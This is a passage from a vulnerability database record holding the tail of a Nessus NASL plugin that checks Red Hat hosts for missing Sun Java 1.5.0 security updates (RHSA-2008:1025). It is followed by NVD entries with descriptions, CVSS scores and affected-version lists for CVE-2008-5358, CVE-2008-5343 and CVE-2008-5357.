189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:1025\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.5.0-sun-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.5.0-sun-demo-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-demo-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.5.0-sun-devel-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-devel-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.5.0-sun-jdbc-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-jdbc-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.5.0-sun-plugin-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.5.0-sun-src-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-src-1.5.0.17-1jpp.2.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.5.0-sun-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.5.0-sun-demo-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-demo-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.5.0-sun-devel-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-devel-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.5.0-sun-jdbc-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-jdbc-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.5.0-sun-plugin-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.5.0-sun-src-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-src-1.5.0.17-1jpp.2.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.5.0-sun / java-1.5.0-sun-demo / java-1.5.0-sun-devel / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T19:28:27", "description": "Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier might allow remote attackers to execute arbitrary code via a crafted GIF file that triggers memory corruption during display of the splash screen, possibly related to splashscreen.dll.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5358", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5358"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:6", "cpe:/a:sun:jdk:6"], "id": "CVE-2008-5358", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5358", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:26", "description": "Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier allows remote attackers to make unauthorized network connections and hijack HTTP sessions via a crafted file that validates as both a GIF and a Java JAR file, aka \"GIFAR\" and CR 6707535.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5343", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 8.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5343"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5343", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5343", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:N/C:C/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:04", "description": "Integer overflow in Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; SDK and JRE 1.4.2_18 and earlier; and SDK and JRE 1.3.1_23 and earlier might allow remote attackers to execute arbitrary code via a crafted TrueType font file, which triggers a heap-based buffer overflow.", "edition": 7, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5357", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5357"], "modified": "2019-10-09T22:56:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.3.1", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:jre:1.4.2", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.4.2", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5357", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5357", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", 